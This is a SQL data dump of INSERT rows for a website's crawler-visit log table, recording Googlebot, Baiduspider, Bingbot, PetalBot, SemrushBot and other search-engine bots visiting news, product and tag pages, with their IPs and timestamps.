INSERT INTO `ey_weapp_spider_visit` VALUES ('97053', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/219.html', '66.249.79.108', '1661569154', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96909', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/118.html', '66.249.79.110', '1661503934', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96892', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/337.html', '116.179.32.101', '1661496286', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96707', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/306.html', '66.249.79.110', '1661435151', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98379', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/contact', '114.119.151.155', '1662173668', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96885', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '175.182.182.132', '1661491346', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96886', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/50.html', '116.179.32.160', '1661491375', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97382', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661703413', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96702', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/case/237.html', '207.46.13.213', '1661434241', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94215', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/439.html', '216.244.66.194', '1660149552', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98920', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/492.html', '207.46.13.144', '1662432239', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96697', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/261.html', '114.119.151.153', '1661432115', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96699', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/liuzhou.html', '114.119.151.153', '1661433003', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98415', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bljxw/list_18_50/', '162.55.86.60', '1662194512', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96685', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/283.html', '216.244.66.194', '1661427973', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96686', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/qinghaisheng.html', '114.119.151.155', '1661428308', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96683', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/products/331.html', '157.55.39.117', '1661427219', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96718', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/148.html', '114.119.151.155', '1661439942', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96682', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/493.html', '66.249.79.110', '1661427027', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96681', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661426883', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96684', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/gjxw/', '66.249.79.110', '1661427264', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('99159', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/list_3_70/', '162.55.86.60', '1662487764', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96688', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/396.html', '17.121.112.231', '1661428615', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96678', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/news/496.html', '42.236.17.205', '1661424328', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96676', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/', '185.191.171.17', '1661423784', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96680', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_23.html', '185.191.171.38', '1661426210', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96677', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661424047', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96675', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/', '220.181.108.155', '1661423598', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96689', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.37', '1661428725', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96672', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/70.html', '185.191.171.9', '1661420897', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96673', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/66.html', '116.179.32.102', '1661421961', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96692', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/385.html', '114.119.151.153', '1661429664', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96674', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/buliaojial/list_21_2/', '17.121.115.220', '1661422228', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96687', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/77.html', '66.249.79.110', '1661428601', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96662', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661414694', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96669', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/118.html', '66.249.79.112', '1661419157', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96661', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_34/', '185.191.171.23', '1661413568', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96695', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/498.html', '66.249.79.108', '1661431598', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96659', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/107.html', '116.179.32.151', '1661412143', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96658', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/306.html', '114.119.151.153', '1661410570', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96660', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.37', '1661413165', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96663', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_38/', '185.191.171.3', '1661415420', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96653', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/345.html', '66.249.79.112', '1661408128', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96643', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/tuobengal/', '114.119.151.155', '1661405971', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96652', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_61/', '185.191.171.16', '1661407957', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96654', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_20/', '114.119.151.155', '1661408264', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96613', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/159.html', '116.179.32.209', '1661386954', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96715', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/358.html', '185.191.171.38', '1661439271', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96716', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/as.html', '114.119.151.155', '1661439293', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96656', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/110.html', '220.181.108.84', '1661408869', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96696', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/498.html', '66.249.79.110', '1661431599', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96601', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_45.html', '185.191.171.38', '1661382184', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96728', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcxw/list_19_9/', '162.55.86.60', '1661444193', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96602', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/60.html', '185.191.171.2', '1661382398', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96727', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcxw/list_19_5/', '162.55.86.60', '1661444182', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96726', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcxw/list_19_4/', '162.55.86.60', '1661444174', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96635', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.106', '1661402665', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96593', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.98', '1661379657', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96591', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/232.html', '66.249.79.106', '1661379374', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96592', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/38.html', '185.191.171.4', '1661379428', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96931', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '42.236.10.104', '1661508868', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96701', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_34.html', '220.181.108.82', '1661433415', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96623', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/177.html', '66.249.79.110', '1661393266', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96600', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/174.html', '185.191.171.17', '1661381870', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96603', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661382654', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96723', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/168.html', '185.191.171.38', '1661442852', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96724', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcxw/list_19_2/', '162.55.86.60', '1661444148', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96725', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/bcxw/list_19_3/', '162.55.86.60', '1661444158', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96605', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/gjxw/', '66.249.79.110', '1661383132', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96722', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1661442322', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96606', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/154.html', '185.191.171.11', '1661383665', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96607', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/203.html', '157.55.39.153', '1661383938', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96720', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/53.html', '185.191.171.7', '1661440677', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96721', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/339.html', '66.249.79.112', '1661441384', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96608', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/21.html', '185.191.171.20', '1661383990', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96609', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/199.html', '185.191.171.23', '1661384692', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96717', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/306.html', '66.249.79.112', '1661439820', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96632', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.91', '1661399054', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96619', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/405.html', '207.46.13.9', '1661391908', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96616', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661388742', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96712', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/495.html', '185.191.171.34', '1661437879', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96698', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/about/', '66.249.79.112', '1661432934', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96615', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/141.html', '114.119.151.153', '1661388656', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96614', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/92.html', '114.119.151.155', '1661387547', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96713', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/chukouquanqiu/', '114.119.151.155', '1661438089', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96714', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_14.html', '185.191.171.41', '1661439215', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96611', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_57/', '185.191.171.23', '1661385800', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96612', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/39_2.html', '185.191.171.5', '1661385808', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96634', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tuobengal', '220.181.108.103', '1661402324', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96633', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/185.html', '185.191.171.26', '1661400196', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96610', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bcxw/list_19_6/', '114.119.151.153', '1661384891', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96598', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/357.html', '114.119.151.153', '1661381531', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96597', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/184.html', '185.191.171.9', '1661380818', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96729', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/blj/list_12_2/', '162.55.86.60', '1661444205', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96599', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/212.html', '114.119.151.153', '1661381702', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96596', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.98', '1661380646', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96595', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/456.html', '185.191.171.44', '1661380227', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96594', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.98', '1661380133', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96655', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/386.html', '114.119.151.155', '1661408549', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96976', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/hangyexinwen/list_18_7/', '114.119.151.153', '1661539236', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96978', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/2_4.html', '185.191.171.10', '1661539923', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96565', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/26.html', '66.249.79.110', '1661364704', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96589', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/148.html', '66.249.79.112', '1661377497', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96553', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/486.html', '17.121.114.68', '1661360521', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97493', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/458.html', '216.244.66.194', '1661758420', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96552', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.80', '1661360413', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96559', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/102.html', '114.119.151.153', '1661362747', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97491', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/43.html', '66.249.79.112', '1661757287', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97489', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/417.html', '216.244.66.194', '1661755918', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96747', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/239.html', '162.55.86.60', '1661444354', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96551', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/sss.html', '114.119.151.155', '1661359983', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96755', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/list_4_2/', '162.55.86.60', '1661444422', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96542', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/382.html', '185.191.171.9', '1661356138', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96750', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/58.html', '162.55.86.60', '1661444377', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96751', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/65.html', '162.55.86.60', '1661444392', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96753', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/68.html', '162.55.86.60', '1661444410', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96754', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/73.html', '162.55.86.60', '1661444417', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96549', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_40/', '216.244.66.194', '1661359681', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96748', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/240.html', '162.55.86.60', '1661444362', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96749', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/241.html', '162.55.86.60', '1661444368', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96540', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.145', '1661354328', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96752', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/case/66.html', '162.55.86.60', '1661444400', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96541', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1.html', '185.191.171.7', '1661356128', '0');
